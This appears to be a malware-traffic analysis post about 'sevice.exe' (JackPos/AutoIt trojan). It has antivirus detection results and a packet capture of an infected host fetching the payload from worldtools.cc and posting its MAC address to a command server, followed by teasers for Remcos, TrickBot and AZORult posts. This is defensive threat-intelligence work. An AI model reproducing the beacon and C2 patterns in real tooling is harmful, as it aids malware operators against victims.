| SHA256: | ac6d8abf4143abbeba5b973b684141ff8abe947f2a63384d3252c2b8b0700750 |
| File name: | sevice.exe |
| Detection ratio: | 43 / 56 |
| Kaspersky | Trojan.Win32.Autoit.fgg | 20170116 |
| Malwarebytes | Spyware.JackPos | 20170116 |
| McAfee | Artemis!40C9604050E2 | 20170108 |
| McAfee-GW-Edition | BehavesLike.Win32.Generic.tc | 20170116 |
| eScan | Trojan.GenericKD.4147639 | 20170116 |
| Microsoft | Trojan:Win32/Dynamer!ac | 20170116 |
| NANO-Antivirus | Trojan.Win32.Autoit.ekgraq | 20170116 |
| Panda | Trj/CI.A | 20170115 |
| Qihoo-360 | Win32/Trojan.d80 | 20170116 |
| Rising | Trojan.Injector!8.C4-BSQtmSMkVWS (cloud) | 20170116 |
| Sophos | Troj/Autoit-BVM | 20170116 |
| Symantec | Trojan.Gen | 20170115 |
| Tencent | Win32.Trojan.Autoit.Pciz | 20170116 |
| TrendMicro | TROJ_OTOTI.GQA | 20170116 |
| TrendMicro-HouseCall | TROJ_OTOTI.GQA | 20170116 |
| VIPRE | Trojan.Win32.Generic!BT | 20170116 |
| ViRobot | Trojan.Win32.S.Autoit.1534464[h] |
2017-01-16 00:05:06.003162 IP 192.168.1.102.63152 > 193.109.68.128.80: Flags [P.], seq 0:291, ack 1, win 256, length 291: HTTP: GET /exec/sevice.exe HTTP/1.1
E..KI#@……..f.mD….P.eh.G../P…&…GET /exec/sevice.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: worldtools.cc
Connection: Keep-Alive
2017-01-16 00:05:39.211577 IP 192.168.1.102.61331 > 75.75.75.75.53: 21636+ A? worldtools.cc. (31)
E..;…….[…fKKKK…5.’..T………..
worldtools.cc…..
2017-01-16 00:05:39.344430 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [S], seq 1759156153, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4K.@….F…f.mD….Ph……… ..~…………..
2017-01-16 00:05:39.469489 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [.], ack 1051522394, win 256, length 0
E..(K.@….Q…f.mD….Ph…>..ZP….:……..
2017-01-16 00:05:39.470028 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [P.], seq 0:48, ack 1, win 256, length 48: HTTP: GET /post/echo HTTP/1.1
E..XK.@…. …f.mD….Ph…>..ZP…X…GET /post/echo HTTP/1.1
Host: worldtools.cc
2017-01-16 00:05:39.640279 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [P.], seq 48:238, ack 223, win 255, length 190: HTTP: POST /post HTTP/1.1
E…K.@……..f.mD….Ph…>..8P…U…POST /post HTTP/1.1
User-Agent: something
Content-Type: application/x-www-form-urlencoded
Host: worldtools.cc
Content-Length: 29
Cache-Control: no-cache
mac=00-0C-29-18-4A-91&t1=&t2=
2017-01-16 00:05:40.392086 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [.], ack 443, win 254, length 0
E..(K.@….N…f.mD….Ph…>…P………….
2017-01-16 00:05:45.339491 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [.], ack 444, win 254, length 0
E..(K.@….M…f.mD….Ph…>…P………….
Written By
Remcos is a RAT type malware which means that attackers use it to perform actions on infected machines remotely. This malware is extremely actively caped up to date with updates coming out almost every single month. TypeTrojan Originex-USSR territory First seen1 June, 2016 Last seen9 February, 2020 2020-02-08 21:12:20.981585 IP 192.168.86.25.56271 > 46.4.22.188.80: Flags...
JA3 Fingerprint:f735bbc6b69723b9df7b0e7ef27872afFirst seen:2018-10-02 18:04:16 UTCLast seen:2020-01-15 05:53:57 UTCStatus:BlacklistedMalware samples:1'816Destination IPs:193Malware:TrickBot Listing date:2020-01-09 14:17:18 2020-01-16 06:18:01.857421 IP 192.1...
JA3 Fingerprint:f735bbc6b69723b9df7b0e7ef27872afFirst seen:2018-10-02 18:04:16 UTCLast seen:2020-01-15 05:53:57 UTCStatus:BlacklistedMalware samples:1'816Destination IPs:193Malware:TrickBot Listing date:2020-01-09 14:17:18 2020-01-16 06:18:01.857421 IP 192.168.8...
AZORult can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. ...
